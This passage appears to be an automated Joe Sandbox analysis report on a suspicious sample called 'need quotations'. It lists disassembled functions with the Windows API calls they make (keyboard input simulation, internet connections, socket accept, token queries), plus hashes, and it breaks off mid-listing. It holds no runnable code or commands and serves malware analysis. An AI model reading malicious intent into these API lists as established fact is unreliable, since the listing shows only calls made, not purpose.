InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002AB5D1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 219999bb282284df9f406f659cc784125d0870f8580f29b432e5949d5ecd0811
Instruction ID: 44f5e59c426bbffe78e301d97196822526ab30e5332028d47a9a73c8d3f3eb4b
Opcode Fuzzy Hash: 219999bb282284df9f406f659cc784125d0870f8580f29b432e5949d5ecd0811
Instruction Fuzzy Hash: A631B474A21205AFEB268F28DC99FA87769EB07710F944112FA51D61E3CF70A970CB51

Function 002AD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 002AD807
GetWindowRect.USER32(?,?), ref: 002AD87D
PtInRect.USER32(?,?,002AED5A), ref: 002AD88D
MessageBeep.USER32(00000000), ref: 002AD8FE

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0591468edea9d73761d433a03490f9bef5f529f3be00f2ca8f3538c4f85a5753
Instruction ID: f40cab9f174f75785d19c792ff2c4a7ccd3f3d07a834cf3a4df0738e557a1bcc
Opcode Fuzzy Hash: 0591468edea9d73761d433a03490f9bef5f529f3be00f2ca8f3538c4f85a5753
Instruction Fuzzy Hash: DB41B070A10219DFCB12DF58D884FA97BF5FF4A311F1881AAE8168B660DB35E952CF40

Function 00283A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00283AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00283AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00283B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00283B92

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9a16e0ec0a3c1d3d72ec44fca76c79856dba2582e694dc6586b42f70782e7a91
Instruction ID: ba99b4f8db8b0a2b293e502afe835b96d436d712d1d666813856adb261451ae6
Opcode Fuzzy Hash: 9a16e0ec0a3c1d3d72ec44fca76c79856dba2582e694dc6586b42f70782e7a91
Instruction Fuzzy Hash: B33168B8922249AEEF30FF64C819BFE7BA5AB45718F04011AE481932D1C7748F65C765

Function 00274004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00274038
__isleadbyte_l.LIBCMT ref: 00274066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00274094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002740CA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a7cb2bca702dbb58e2c791f100d9b55f87da58dc06e877a846ded3bc5f245511
Instruction ID: 7623c79dd061352b8815510f60c9942e192890cb586881888a72b5bc48bbdff6
Opcode Fuzzy Hash: a7cb2bca702dbb58e2c791f100d9b55f87da58dc06e877a846ded3bc5f245511
Instruction Fuzzy Hash: DB31C431620216EFDB25AF75C844B7B7BA5FF40310F15C429EA6987190E731D8B0DB90

Function 002A7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002A7CB9

Part of subcall function 00285F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00285F6F
Part of subcall function 00285F55: GetCurrentThreadId.KERNEL32 ref: 00285F76
Part of subcall function 00285F55: AttachThreadInput.USER32(00000000,?,0028781F), ref: 00285F7D

GetCaretPos.USER32(?), ref: 002A7CCA
ClientToScreen.USER32(00000000,?), ref: 002A7D03
GetForegroundWindow.USER32 ref: 002A7D09

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: e28de422c2bffba09214c622ece5e794310b460e2d968475fb2cc21a8df312a2
Instruction ID: 677a451b57992fcf4fad7d13df46f5dceb21669fbd117de4b9784e75011e0511
Opcode Fuzzy Hash: e28de422c2bffba09214c622ece5e794310b460e2d968475fb2cc21a8df312a2
Instruction Fuzzy Hash: E2313C72910108AFDB10EFA9DC859EFFBF9EF59311B11846AE815E3251DA309E158FA0

Function 002AF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetCursorPos.USER32(?), ref: 002AF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002BE4C0,?,?,?,?,?), ref: 002AF226
GetCursorPos.USER32(?), ref: 002AF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002BE4C0,?,?,?), ref: 002AF2A6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: d62ec83b2ac881df93d6422f6b4b465f99a6b571454554a69bb89cb627920838
Instruction ID: 3f74897957a0799feb705c7455f7d4cdcfaba1797bb175751b40398a7f87f027
Opcode Fuzzy Hash: d62ec83b2ac881df93d6422f6b4b465f99a6b571454554a69bb89cb627920838
Instruction Fuzzy Hash: CA21B139511018AFCB168F94DC98EFEBBB9EF0A350F444069FD09472A1D7359D61DB50

Function 0029431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00294358

Part of subcall function 002943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00294401
Part of subcall function 002943E2: InternetCloseHandle.WININET(00000000), ref: 0029449E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a541faaa2ce51671c146140a50541c5816e0ee5b2e2dada84bbf550c1e3eb3b8
Instruction ID: 9000f802697b0e5d01d08156b2f2382f32997037a50337b7c2563e9fc79b7052
Opcode Fuzzy Hash: a541faaa2ce51671c146140a50541c5816e0ee5b2e2dada84bbf550c1e3eb3b8
Instruction Fuzzy Hash: 8B21C335210606BFEF16AF70DC00FBBB7A9FF48711F20401AFA5596650DBB198369B94

Function 002A8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 002A8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 002A8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 002A8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002A8ADC

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: fe2aadcc10f07cd856f4095be967030e0d07d0eb5ce6b2925d628470079791c8
Instruction ID: fd3d03bd4f17eedd880c8d4407f4f3e12dcdb71f20c388bc2b1a4459005fb59f
Opcode Fuzzy Hash: fe2aadcc10f07cd856f4095be967030e0d07d0eb5ce6b2925d628470079791c8
Instruction Fuzzy Hash: D7119331265511AFD718AB14DC05FBA779DBF86321F14451AF916C72E2CFB0AD208B94

Function 00298A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00298AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00298AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 00298AFF
WSAGetLastError.WSOCK32(00000000), ref: 00298B16

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 5812dbce67d4ea7f55158236c06c57916ea233940502483526e16730f1cbc878
Instruction ID: 3e21c4d934a997e6ac976273a309435f2bfa48ea9f122e1938769afeb9c30677
Opcode Fuzzy Hash: 5812dbce67d4ea7f55158236c06c57916ea233940502483526e16730f1cbc878
Instruction Fuzzy Hash: 83219372A001249FCB119F68D899E9EBBECEF4A710F04816AF849D7291DB74DA458F90

Function 00280AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00281E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00280ABB,?,?,?,0028187A,00000000,000000EF,00000119,?,?), ref: 00281E77
Part of subcall function 00281E68: lstrcpyW.KERNEL32(00000000,?,?,00280ABB,?,?,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00281E9D
Part of subcall function 00281E68: lstrcmpiW.KERNEL32(00000000,?,00280ABB,?,?,?,0028187A,00000000,000000EF,00000119,?,?), ref: 00281ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00280AD4
lstrcpyW.KERNEL32(00000000,?,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00280AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,0028187A,00000000,000000EF,00000119,?,?,00000000), ref: 00280B2E

Strings

cdecl, xrefs: 00280B25

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 42c8f95b5693bb8fd1550128af2774aad87e07fed4b61e928122fc3e5cfdacf6
Instruction ID: c0c5937cb98298b487ae4ee09dc87860e788412dced2b3ba8d3abb9c48be2f32
Opcode Fuzzy Hash: 42c8f95b5693bb8fd1550128af2774aad87e07fed4b61e928122fc3e5cfdacf6
Instruction Fuzzy Hash: 1D11D33A221305EFDB25AF24DC45D7A77A8FF45354B80406AE90ACB291EB719865CBA0

Function 00272F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00272FB5

Part of subcall function 0026395C: __FF_MSGBANNER.LIBCMT ref: 00263973
Part of subcall function 0026395C: __NMSG_WRITE.LIBCMT ref: 0026397A
Part of subcall function 0026395C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,00000001,00000000,?,?,0025F507,?,0000000E), ref: 0026399F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b4ecf144822241e9c0d06ee57e117d1b9809dc62235fd23a9104b406cd30dc2c
Instruction ID: 01c723e9f7c430a902224cb12f4471d86b75fb608b03a3d0ad95c93b0e23aa85
Opcode Fuzzy Hash: b4ecf144822241e9c0d06ee57e117d1b9809dc62235fd23a9104b406cd30dc2c
Instruction Fuzzy Hash: 3A110A32439212EBCB317F74BC4466A3B98AF10364F20C426F84D96161DB75C9B0AE91

Function 0025EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0025EBB2

Part of subcall function 002451AF: _memset.LIBCMT ref: 0024522F
Part of subcall function 002451AF: _wcscpy.LIBCMT ref: 00245283
Part of subcall function 002451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00245293

KillTimer.USER32(?,00000001,?,?), ref: 0025EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B3C88

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: faf763226c8388f62529fd6d417d472bc976f3c42e042437423ba531a5f01298
Instruction ID: 31c27600528c468568d0269077ebd5356e91b3dbdc2e78c333314b69883b7611
Opcode Fuzzy Hash: faf763226c8388f62529fd6d417d472bc976f3c42e042437423ba531a5f01298
Instruction Fuzzy Hash: D22107705147849FEB37CB689859BEBBFEC9B01309F04009EE6CE56141C3B06B88CB51

Function 0028058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002805AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002805C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002805DD
FreeLibrary.KERNEL32(?), ref: 00280632

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: d7419585c55ee4a7a639c9c611403a7c2e0635b4a299f55631c6baddf2bb31a3
Instruction ID: 522fe595a34e03adf3bee3cc18e626b40daac53fab68177fe1f5c41a717efd97
Opcode Fuzzy Hash: d7419585c55ee4a7a639c9c611403a7c2e0635b4a299f55631c6baddf2bb31a3
Instruction Fuzzy Hash: 01218775911619EFEB60AF91DCC8EDAB7BCEF40700F008469E51692090E7B0EA69DF50

Function 00286713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00286733
_memset.LIBCMT ref: 00286754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002867A6
CloseHandle.KERNEL32(00000000), ref: 002867AF

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: e2f01d99ad6773249bd8f27de088e39c8e777b79fc1e75d34b0f6cfafca25b50
Instruction ID: 413f7c25f7b7c91e87be4768f812f825735462cca680d5197a1d1b6c9847e143
Opcode Fuzzy Hash: e2f01d99ad6773249bd8f27de088e39c8e777b79fc1e75d34b0f6cfafca25b50
Instruction Fuzzy Hash: D8110A75D012287AE7206BA5AC4DFABBABCEF44764F1041AAF508E71C0D2704E808BA4

Function 0027B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0027AA79
Part of subcall function 0027AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0027AA83
Part of subcall function 0027AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0027AA92
Part of subcall function 0027AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0027AA99
Part of subcall function 0027AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0027AAAF

GetLengthSid.ADVAPI32(?,00000000,0027ADE4,?,?), ref: 0027B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0027B227
HeapAlloc.KERNEL32(00000000), ref: 0027B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0027B247

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 78777de371072de49d00be6c574790b62a83f50fa8b9719d8d1c97e220425bbf
Instruction ID: 39ebfe1b7244783c536bea1041e94cac1c6869a28b8e71b304802aa7760edc83
Opcode Fuzzy Hash: 78777de371072de49d00be6c574790b62a83f50fa8b9719d8d1c97e220425bbf
Instruction Fuzzy Hash: 4611CE71A11206EFCB059F98DC94FAEB7B9EF84318F14C06DE94A97211D771AE54CB10

Function 0027B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0027B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0027B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0027B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0027B4DB

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9ef64e643a5155bfbc152665e01d41e7713c772058398314a8666e482eb5c41a
Instruction ID: 5f20e61b3edc2ab1c3b9349994ece829269354867309209f59d750a0acad08d1
Opcode Fuzzy Hash: 9ef64e643a5155bfbc152665e01d41e7713c772058398314a8666e482eb5c41a
Instruction Fuzzy Hash: 44112A7A900218FFDB11DFA9C995F9DBBB8FB08710F208091E604B7295D771AE11DB94

Function 0025B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0025B5A5
GetClientRect.USER32(?,?), ref: 002BE69A
GetCursorPos.USER32(?), ref: 002BE6A4
ScreenToClient.USER32(?,?), ref: 002BE6AF

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5046762977ff246ff020d5ef3f0a03a2e79a40a7afb11bd81df4e99cc6f9e3ca
Instruction ID: 8ee99852af513ac9da959823c8f50c2b5e3bc4412c0555d2c5f5b1f63356298f
Opcode Fuzzy Hash: 5046762977ff246ff020d5ef3f0a03a2e79a40a7afb11bd81df4e99cc6f9e3ca
Instruction Fuzzy Hash: 4811363591002ABBCB15DF98DC49CEE77B8EB09305F500455E912E7140E774AAA9CBA5

Function 0028732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00287352
MessageBoxW.USER32(?,?,?,?), ref: 00287385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0028739B
